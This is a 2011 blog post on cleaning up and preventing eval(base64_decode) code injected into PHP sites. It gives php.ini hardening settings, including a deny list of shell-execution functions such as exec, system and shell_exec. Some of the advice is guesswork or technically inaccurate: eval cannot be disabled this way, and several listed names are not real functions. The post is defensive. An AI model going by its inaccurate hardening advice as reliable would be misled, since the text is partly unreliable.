Thursday, July 28, 2011

How to prevent base 64 encode attack

SkyHi @ Thursday, July 28, 2011
If you look in the source code of your PHP files and see that there is a call to eval and base 64 decode that you didn't put there, then your site has been hacked. When this happens, usually there are no records of anyone FTPing or SSHing to your site, leaving you scratching your head as to how in the world this hacker got that code into your site.

How did it get there?

I'm not entirely sure of the vulnerability that lets this hack in, but I do know that after being repeatedly hit with it for several weeks, I managed to stop it entirely after I updated my PHP configuration to forbid the fopen and file_get_contents functions from opening off-site URLs.
This seems to suggest that there was code somewhere on my site that was allowing a malicious user's script to execute on my server, which was able to then write the eval base 64 decode function calls into all of my PHP files. Since I have seen this happen to Wordpress users, it looks like Wordpress has the vulnerability in it somewhere.

How do I stop it?

First, add the following lines to your php.ini file. Check with your hosting provider to find out if and how you can edit your php.ini file.
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Once you've done this, REMOVE ALL INSTANCES OF THE MALICIOUS CODE FROM YOUR SITE. This attack tends to add the bad code to every PHP file on your site, so you might want to run a script to remove all occurrences of it. The bad code can still work even if you add those lines to your php.ini file, so it is imperative that you get rid of all of it as soon as possible.
If you use fopen or file_get_contents on your site, they might stop working after you make this change. If your web host has the CURL module installed with PHP, then you can use that to load off-site URLs.
The above changes will disable the functions that make PHP the most vulnerable. However, if your site depends on any of them, you will have to either find a different way to do it, or to enable the functions that you need.
Above all, NEVER use a variable in a call to a function like fopen or file get contents. Look for any places in your code where a malicious user could inject malicious code. Read more about how to prevent cross-site scripting (XSS) attacks.

What does it do?

The eval base 64 decode code is actually a PHP or JavaScript function call, encoded in base 64. The eval function runs the decoded text. In this way, the hacker can run any PHP function that he or she wants to. Usually, this is used to put malware onto your site. Whenever you see Google warn you that a site has malware on it, it might be because an otherwise good site has been hit with this hack.